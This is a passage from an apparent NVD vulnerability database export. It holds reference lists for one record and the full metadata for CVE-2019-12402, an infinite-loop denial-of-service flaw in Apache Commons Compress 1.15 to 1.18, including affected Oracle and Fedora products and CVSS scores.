"https://access.redhat.com/errata/RHSA-2017:2637", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2638", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2808", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2809", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2810", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2811", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2888", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2889", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:3244", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:3399", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:3400", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1545", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Vendor Advisory", ], url: "https://issues.apache.org/jira/browse/LOG4J2-1863", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/0dcca05274d20ef2d72584edcf8c917bbb13dbbd7eb35cae909d02e9%40%3Cdev.logging.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/277b4b5c2b0e06a825ccec565fa65bd671f35a4d58e3e2ec5d0618e1%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/44491fb9cc19acc901f7cff34acb7376619f15638439416e3e14761c%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/479471e6debd608c837b9815b76eab24676657d4444fcfd5ef96d6e6%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/6114ce566200d76e3cc45c521a62c2c5a4eac15738248f58a99f622c%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/84cc4266238e057b95eb95dfd8b29d46a2592e7672c12c92f68b2917%40%3Cannounce.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/8ab32b4c9f1826f20add7c40be08909de9f58a89dc1de9c09953f5ac%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/e8fb7d76a244ee997ba4b217d6171227f7c2521af8c7c5b16cba27bc%40%3Cdev.logging.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/eea03d504b36e8f870e8321d908e1def1addda16adda04327fe7c125%40%3Cdev.logging.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r0831e2e52a390758ce39a6193f82c11c295175adce6e6307de28c287%40%3Cissues.beam.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r18f1c010b554a3a2d761e8ffffd8674fd4747bcbcf16c643d708318c%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r23369fd603eb6d62d3b883a0a28d12052dcbd1d6d531137124cd7f83%40%3Cgithub.beam.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r2ce8d26154bea939536e6cf27ed02d3192bf5c5d04df885a80fe89b3%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r2ff63f210842a3c5e42f03a35d8f3a345134d073c80a04077341c211%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r3784834e80df2f284577a5596340fb84346c91a2dea6a073e65e3397%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r3a85514a518f3080ab1fc2652cfe122c2ccf67cfb32356acb1b08fe8%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r3d666e4e8905157f3c046d31398b04f2bfd4519e31f266de108c6919%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r4b25538be50126194cc646836c718b1a4d8f71bd9c912af5b59134ad%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r61590890edcc64140e0c606954b29a063c3d08a2b41d447256d51a78%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r681b4432d0605f327b68b9f8a42662993e699d04614de4851c35ffd1%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r746fbc3fc13aee292ae6851f7a5080f592fa3a67b983c6887cdb1fc5%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r7bcdc710857725c311b856c0b82cee6207178af5dcde1bd43d289826%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r94b5aae09c4bcff5d06cf641be17b00bd83ba7e10cad737bf16a1b8f%40%3Cgithub.beam.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r9d5c1b558a15d374bd5abd2d3ae3ca7e50e796a0efdcf91e9c5b4cdd%40%3Cgithub.beam.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/ra38785cfc0e7f17f8e24bebf775dd032c033fadcaea29e5bc9fffc60%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/ra9a682bc0a8dff1c5cefdef31c7c25f096d9121207cf2d74e2fc563d%40%3Ccommits.logging.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/raedd12dc24412b3780432bf202a2618a21a727788543e5337a458ead%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rb1b29aee737e1c37fe1d48528cb0febac4f5deed51f5412e6fdfe2bf%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rbfa7a0742be4981a3f9356a23d0e1a5f2e1eabde32a1a3d8e41420f8%40%3Cgithub.beam.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rc1eaed7f7d774d5d02f66e49baced31e04827a1293d61a70bd003ca7%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rca24a281000fb681d7e26e5c031a21eb4b0593a7735f781b53dae4e2%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rcbb79023a7c8494cb389cd3d95420fa9e0d531ece0b780b8c1f99422%40%3Ccommits.doris.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rd5dbeee4808c0f2b9b51479b50de3cc6adb1072c332a200d9107f13e%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rdbd579dc223f06af826d7de340218ee2f80d8b43fa7e4decb2a63f44%40%3Cgithub.beam.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rdec0d8ac1f03e6905b0de2df1d5fcdb98b94556e4f6cccf7519fdb26%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/re8c21ed9dd218c217d242ffa90778428e446b082b5e1c29f567e8374%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rf2567488cfc9212b42e34c6393cfa1c14e30e4838b98dda84d71041f%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20180726-0002/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20181107-0002/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, ], sourceIdentifier: "security@apache.org", vulnStatus: "Deferred", weaknesses: [ { description: [ { lang: "en", value: "CWE-502", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2019-08-30 09:15
Modified
2024-11-21 04:22
Severity ?
Summary
The file name encoding algorithm used internally in Apache Commons Compress 1.15 to 1.18 can get into an infinite loop when faced with specially crafted inputs. This can lead to a denial of service attack if an attacker can choose the file names inside of an archive created by Compress.
References
Impacted products
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:apache:commons_compress:*:*:*:*:*:*:*:*", matchCriteriaId: "915E4B88-B2DA-40C0-AD95-9888FD42EEAF", versionEndIncluding: "1.18", versionStartIncluding: "1.15", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", matchCriteriaId: "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", vulnerable: true, }, { criteria: "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", matchCriteriaId: "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:banking_payments:*:*:*:*:*:*:*:*", matchCriteriaId: "2FF46C9A-7768-4E52-A676-BEA6AE766AD4", versionEndIncluding: "14.4.0", versionStartIncluding: "14.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", matchCriteriaId: "132CE62A-FBFC-4001-81EC-35D81F73AF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.7.0:*:*:*:*:*:*:*", matchCriteriaId: "282150FF-C945-4A3E-8A80-E8757A8907EA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.8.0:*:*:*:*:*:*:*", matchCriteriaId: "FBCE22C0-4253-40A5-89AE-499A3BC9EFF3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.9.0:*:*:*:*:*:*:*", matchCriteriaId: "AB9FC9AB-1070-420F-870E-A5EC43A924A4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*", matchCriteriaId: "B51F78F4-8D7E-48C2-86D1-D53A6EB348A7", versionEndIncluding: "8.2.2", versionStartIncluding: "8.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_ip_service_activator:7.3.0:*:*:*:*:*:*:*", matchCriteriaId: "DE48E0FE-5931-441C-B4FF-253BD9C48186", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_ip_service_activator:7.4.0:*:*:*:*:*:*:*", matchCriteriaId: "DE7A60DB-A287-4E61-8131-B6314007191B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*", matchCriteriaId: "3E5416A1-EE58-415D-9645-B6A875EBAED2", versionEndIncluding: "8.2.2", versionStartIncluding: "8.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*", matchCriteriaId: "11B0C37E-D7C7-45F2-A8D8-5A3B1B191430", versionEndIncluding: "8.2.2", versionStartIncluding: "8.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:*", matchCriteriaId: "727DF4F5-3D21-491E-96B9-EC973A6C9C18", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:essbase:21.2:*:*:*:*:*:*:*", matchCriteriaId: "394A16F2-CCD4-44E5-BF6B-E0C782A9FA38", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:12.1.0:*:*:*:*:*:*:*", matchCriteriaId: "21BE77B2-6368-470E-B9E6-21664D9A818A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:12.3.0:*:*:*:*:*:*:*", matchCriteriaId: "3250073F-325A-4AFC-892F-F2005E3854A5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:12.4.0:*:*:*:*:*:*:*", matchCriteriaId: "0DDDC9C2-33D6-4123-9ABC-C9B809A6E88E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:14.0.0:*:*:*:*:*:*:*", matchCriteriaId: "991A279B-9D7C-4E39-8827-BC21C2C03B83", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:14.1.0:*:*:*:*:*:*:*", matchCriteriaId: "A69266D2-72D0-4A6C-883D-2597FE30931B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_private_banking:12.0.0:*:*:*:*:*:*:*", matchCriteriaId: "6762F207-93C7-4363-B2F9-7A7C6F8AF993", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_private_banking:12.1.0:*:*:*:*:*:*:*", matchCriteriaId: "1B74B912-152D-4F38-9FC1-741D6D0B27FC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_infrastructure_technology:11.1.2.4:*:*:*:*:*:*:*", matchCriteriaId: "DED59B62-C9BF-4C0E-B351-3884E8441655", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "335AB6A7-3B1F-4FA8-AF08-7D64C16C4B04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_pt_peopletools:8.56:*:*:*:*:*:*:*", matchCriteriaId: "CEB3BE9F-44AC-4EE0-9E66-2B72CF4AF0F5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_pt_peopletools:8.57:*:*:*:*:*:*:*", matchCriteriaId: "99BA317E-3C52-4BAF-B61C-803B7208C155", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_pt_peopletools:8.58:*:*:*:*:*:*:*", matchCriteriaId: "929638B0-AAD1-4326-9549-2FA8D03AA7ED", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "597495A7-FE17-4B31-804D-B28C2B872B4D", versionEndIncluding: "18.8.8", versionStartIncluding: "18.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:19.12.0:*:*:*:*:*:*:*", matchCriteriaId: "B201A85E-1310-46B8-8A3B-FF7675F84E09", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:15.0:*:*:*:*:*:*:*", matchCriteriaId: "42064F46-3012-4FB1-89BA-F13C2E4CBB6B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:16.0:*:*:*:*:*:*:*", matchCriteriaId: "F73E2EFA-0F43-4D92-8C7D-9E66811B76D6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*", matchCriteriaId: "11DA6839-849D-4CEF-85F3-38FE75E07183", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*", matchCriteriaId: "BCE78490-A4BE-40BD-8C72-0A4526BBD4A4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*", matchCriteriaId: "55AE3629-4A66-49E4-A33D-6D81CC94962F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*", matchCriteriaId: "4CB39A1A-AD29-45DD-9EB5-5E2053A01B9A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_xstore_point_of_service:19.0:*:*:*:*:*:*:*", matchCriteriaId: "27C26705-6D1F-4D5E-B64D-B479108154FF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D6A4F71A-4269-40FC-8F61-1D1301F2B728", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "5A502118-5B2B-47AE-82EC-1999BD841103", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "The file name encoding algorithm used internally in Apache Commons Compress 1.15 to 1.18 can get into an infinite loop when faced with specially crafted inputs. This can lead to a denial of service attack if an attacker can choose the file names inside of an archive created by Compress.", }, { lang: "es", value: "El algoritmo de codificación de nombre de archivo utilizado internamente en Apache Commons Compress versiones 1.15 hasta 1.18, puede entrar en un bucle infinito cuando se enfrenta a entradas especialmente diseñadas. Esto puede conllevar a un ataque de denegación de servicio si un atacante puede elegir los nombres de archivo dentro de un registro creado por Compress.", }, ], id: "CVE-2019-12402", lastModified: "2024-11-21T04:22:45.983", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 5, confidentialityImpact: "NONE", integrityImpact: "NONE", vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 3.6, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2019-08-30T09:15:17.910", references: [ { source: "security@apache.org", url: "https://lists.apache.org/thread.html/308cc15f1f1dc53e97046fddbac240e6cd16de89a2746cf257be7f5b%40%3Cdev.commons.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/54cc4e9fa6b24520135f6fa4724dfb3465bc14703c7dc7e52353a0ea%40%3Ccommits.creadur.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r05cf37c1e1e662e968cfece1102fcd50fe207181fdbf2c30aadfafd3%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r21d64797914001119d2fc766b88c6da181dc2308d20f14e7a7f46117%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r233267e24519bacd0f9fb9f61a1287cb9f4bcb6e75d83f34f405c521%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r25422df9ad22fec56d9eeca3ab8bd6d66365e9f6bfe311b64730edf5%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r4363c994c8bca033569a98da9218cc0c62bb695c1e47a98e5084e5a0%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r5103b1c9242c0f812ac96e524344144402cbff9b6e078d1557bc7b1e%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r590c15cebee9b8e757e2f738127a9a71e48ede647a3044c504e050a4%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r5caf4fcb69d2749225391e61db7216282955204849ba94f83afe011f%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r7af60fbd8b2350d49d14e53a3ab2801998b9d1af2d6fcac60b060a53%40%3Cdev.brooklyn.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r972f82d821b805d04602976a9736c01b6bf218cfe0c3f48b472db488%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rcc35ab6be300365de5ff9587e0479d10d7d7c79070921837e3693162%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rd3f99d732baed459b425fb0a9e9e14f7843c9459b12037e4a9d753b5%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rdebc1830d6c09c11d5a4804ca26769dbd292d17d361c61dea50915f0%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/re13bd219dd4b651134f6357f12bd07a0344eea7518c577bbdd185265%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3Csolr-user.lucene.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QLJIK2AUOZOWXR3S5XXBUNMOF3RTHTI7/", }, { source: "security@apache.org", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZB3GB7YXIOUKIOQ27VTIP6KKGJJ3CKL/", }, { source: "security@apache.org", url: "https://security.netapp.com/advisory/ntap-20230818-0001/", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "security@apache.org", tags: [ "Not Applicable", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/308cc15f1f1dc53e97046fddbac240e6cd16de89a2746cf257be7f5b%40%3Cdev.commons.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/54cc4e9fa6b24520135f6fa4724dfb3465bc14703c7dc7e52353a0ea%40%3Ccommits.creadur.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r05cf37c1e1e662e968cfece1102fcd50fe207181fdbf2c30aadfafd3%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r21d64797914001119d2fc766b88c6da181dc2308d20f14e7a7f46117%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r233267e24519bacd0f9fb9f61a1287cb9f4bcb6e75d83f34f405c521%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r25422df9ad22fec56d9eeca3ab8bd6d66365e9f6bfe311b64730edf5%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r4363c994c8bca033569a98da9218cc0c62bb695c1e47a98e5084e5a0%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r5103b1c9242c0f812ac96e524344144402cbff9b6e078d1557bc7b1e%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r590c15cebee9b8e757e2f738127a9a71e48ede647a3044c504e050a4%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r5caf4fcb69d2749225391e61db7216282955204849ba94f83afe011f%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r7af60fbd8b2350d49d14e53a3ab2801998b9d1af2d6fcac60b060a53%40%3Cdev.brooklyn.apache.org%3E", }, { source: 